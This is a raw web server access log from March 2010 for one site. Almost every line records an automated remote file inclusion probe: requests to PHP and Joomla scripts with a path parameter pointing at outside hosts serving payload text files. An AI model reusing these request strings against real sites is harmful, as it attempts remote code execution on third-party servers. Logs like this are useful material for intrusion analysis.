92.60.176.46 - - [03/Mar/2010:07:07:28 -0800] "GET /logs/access_100206.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:07:07:35 -0800] "GET /logs/access_100216.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:07:07:35 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:07:07:35 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:07:07:40 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:07:07:44 -0800] "GET /logs/access_100216.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:07:07:44 -0800] "GET /errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:07:07:44 -0800] "GET /logs//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:07:07:49 -0800] "GET /logs/access_100130.log%20%20//errors.php?error=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:07:53 -0800] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:07:53 -0800] "GET /logs/access_100202.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:07:53 -0800] "GET /logs//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:07:53 -0800] "GET /logs//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:07:58 -0800] "GET /logs/access_100220.log//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:08:01 -0800] "GET /logs/access_100220.log//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:08:01 -0800] "GET /logs//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:08:14 -0800] "GET /logs/access_100205.log/errors.php?error=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:08:14 -0800] "GET /logs/errors.php?error=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:08:14 -0800] "GET /errors.php?error=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:08:21 -0800] "GET /logs/access_100206.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:08:22 -0800] "GET /logs/access_100202.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:08:24 -0800] "GET /logs/access_100126.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:08:25 -0800] "GET /logs/access_100203.log/errors.php?error=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:08:26 -0800] "GET /modules/errors.php?error=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:08:26 -0800] "GET /logs//modules/errors.php?error=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:08:26 -0800] "GET /logs/access_100222.log%20%20//modules/errors.php?error=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:08:27 -0800] "GET /modules/errors.php?error=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:08:27 -0800] "GET /logs//modules/errors.php?error=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:08:27 -0800] "GET /logs/access_100222.log%20%20//modules/errors.php?error=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:08:35 -0800] "GET /logs/access_100128.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:09:15 -0800] "GET /logs/access_100126.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:09:22 -0800] "GET /logs/access_100128.log%20%20//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:07:10:14 -0800] "GET /logs/access_100130.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:07:10:14 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:07:10:14 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:07:10:53 -0800] "GET /logs/access_100130.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:07:10:53 -0800] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [03/Mar/2010:07:10:53 -0800] "GET /index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.hsus-math.com.tw//appserv/jan??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:11:48 -0800] "GET /logs/access_100221.log%20%20//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.250.255.242 - - [03/Mar/2010:07:11:56 -0800] "GET /logs/access_100107.log HTTP/1.1" 404 5258 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:12:02 -0800] "GET /logs/errors.php?error=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:12:02 -0800] "GET /logs/access_100205.log%20%20/errors.php?error=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:12:02 -0800] "GET /errors.php?error=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:12:45 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:14:52 -0800] "GET /logs/access_100222.log//modules/errors.php?error=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:14:56 -0800] "GET /logs/access_100221.log%20%20//index.php?f=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:16:47 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:16:47 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:16:47 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:16:53 -0800] "GET /logs/access_100129.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:16:53 -0800] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:16:53 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:16:55 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:17:00 -0800] "GET /logs/access_100207.log%20%20//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:03 -0800] "GET /bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:03 -0800] "GET /logs/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:03 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:19 -0800] "GET /bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:19 -0800] "GET /logs/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:19 -0800] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:28 -0800] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:28 -0800] "GET /bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:28 -0800] "GET /logs/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:30 -0800] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:30 -0800] "GET /logs/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:31 -0800] "GET /logs/access_100209.log%20%20/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:34 -0800] "GET /bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:35 -0800] "GET /logs/access.log%20%20/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:35 -0800] "GET /logs/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:35 -0800] "GET /bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:47 -0800] "GET /logs/access_100209.log%20%20/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:50 -0800] "GET /logs/access_100209.log%20%20/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:18:54 -0800] "GET /logs/access_100209.log%20%20/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:08 -0800] "GET /logs/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:08 -0800] "GET /bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:08 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:08 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:11 -0800] "GET /bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:11 -0800] "GET /logs/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:11 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:13 -0800] "GET /bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:13 -0800] "GET /logs/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:13 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:14 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:14 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:32 -0800] "GET /bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:32 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:33 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:20:35 -0800] "GET /logs/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:21:29 -0800] "GET /logs/become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:21:29 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:21:29 -0800] "GET /become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:21:30 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:22:04 -0800] "GET /become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:22:04 -0800] "GET /logs/become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:22:04 -0800] "GET /logs/access_100218.log%20%20/become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:07:22:08 -0800] "GET /logs/access_100203.log%20%20/become_editor.php?theme_path=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:22:17 -0800] "GET /logs/access_100202.log//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:22:27 -0800] "GET /logs/access_100206.log//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:22:46 -0800] "GET /logs/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:22:46 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:22:50 -0800] "GET /logs/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:22:50 -0800] "GET /logs/access.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:22:50 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:22:51 -0800] "GET /bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [03/Mar/2010:07:22:51 -0800] "GET /logs/access_100209.log/bad_link.php?theme_path=http://dangno.co.kr/gn4/data/file/tb_serv_faq/feel1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:23:01 -0800] "GET /logs/access_100205.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:23:02 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:23:02 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [03/Mar/2010:07:23:07 -0800] "GET /logs/access_100203.log%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:25:03 -0800] "GET /logs/access_100202.log//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:07:25:03 -0800] "GET /logs/access_100206.log//nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:27:56 -0800] "GET //bbs//com./root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:27:56 -0800] "GET /logs///bbs//com./root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:27:56 -0800] "GET /logs/access_100210.log%20%20///bbs//com./root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:27:56 -0800] "GET /logs/access_100203.log%20%20///bbs//com./root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:28:08 -0800] "GET //bbs//com./root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:28:08 -0800] "GET /logs///bbs//com./root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:07:28:08 -0800] "GET /logs/access_100210.log%20%20///bbs//com./root=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
